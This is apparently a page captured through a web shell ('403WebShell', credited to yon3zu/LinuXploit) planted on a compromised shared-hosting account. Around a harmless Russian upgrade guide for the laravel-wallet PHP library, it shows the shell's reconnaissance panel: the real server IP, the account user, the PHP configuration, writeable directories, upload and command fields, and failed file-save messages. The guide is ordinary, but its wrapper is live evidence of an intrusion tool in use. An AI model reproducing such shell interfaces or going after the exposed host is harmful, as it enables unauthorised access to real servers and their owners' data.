Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.119.166.141
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/vendor/bavix/laravel-wallet/docs/ru/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/vendor/bavix/laravel-wallet/docs/ru/upgrade-guide.md
# Обновление

## 1.x.x → 2.x.x

Замените `::with('balance')` на `::with('wallet')`

---

## 2.1.x → 2.2.x

Замените `CanBePaid` на `CanPay`.

Замените `CanBePaidFloat` на `CanPayFloat`.

---

## 2.2.x → 2.4.x

Замените `calculateBalance` на `refreshBalance`

---

## 2.4.x → 3.0.x

Замените путь `bavix.wallet::transaction` на `Bavix\Wallet\Models\Transaction::class`

Замените путь `bavix.wallet::transfer` на `Bavix\Wallet\Models\Transfer::class`

Замените путь `bavix.wallet::wallet` на `Bavix\Wallet\Models\Wallet::class`

```php
// старый вариант
app('bavix.wallet::transaction'); 
// новый вариант
app(Bavix\Wallet\Models\Transaction::class); 
```

Необходимо добавить `$quantity` параметр в метод `canBuy`.

```php
// старый вариант
public function canBuy(Customer $customer, bool $force = false): bool
// новый вариант
public function canBuy(Customer $customer, int $quantity = 1, bool $force = null): bool
```

Необходимо добавить метод `getUniqueId` в Interface `Product`.

```php
class Item extends Model implements Product
{
    
    // Ваш код...
    
    public function getUniqueId(): string
    {
        return (string)$this->getKey();
    }
    
}
```

## 3.0.x → 3.1.x

Замените `Taxing` на `Taxable`.

## 3.1.x → 4.0.x

> Если вы используете php 7.1, то версия 4.0 вам не доступна. 
> Вам необходимо обновить php.

Удалили поддержку старых версий `laravel/cashier`. Поддержка начинается от 7+.

#### Если используете оплаты

Вам необходимо добавить аргумент `Customer $customer` в метод `getAmountProduct` 
вашей модели.

Ваш код на 3.x:
```php
    public function getAmountProduct(): int
    {
        return $this->price;
    }
```

Ваш код на 4.x:
```php
    public function getAmountProduct(Customer $customer): int
    {
        return $this->price;
    }
```

## 4.0.x → 5.0.x

> Обновляясь с версии 4.x до 5.x Вы теряете строгую типизацию. 
> Данная крайность необходима для вычислений с произвольной точностью.

В товарах:

Ваш код в версии 4.x:
```php
    public function getAmountProduct(Customer $customer): int  { ... }

    public function getFeePercent(): float  { ... }

    public function getMinimalFee(): int { ... }
```

Ваш код в версии 5.x:
```php
    public function getAmountProduct(Customer $customer) { ... }

    public function getFeePercent() { ... }

    public function getMinimalFee() { ... }
```

В сервисе обработки курса валют:

Ваш код в версии 4.x:
```php
    protected function rate(Wallet $wallet): float { ... }

    public function convertTo(Wallet $wallet): float { ... }
```

Ваш код в версии 5.x:
```php
    protected function rate(Wallet $wallet) { ... }

    public function convertTo(Wallet $wallet) { ... }
```

Youez - 2016 - github.com/yon3zu
LinuXploit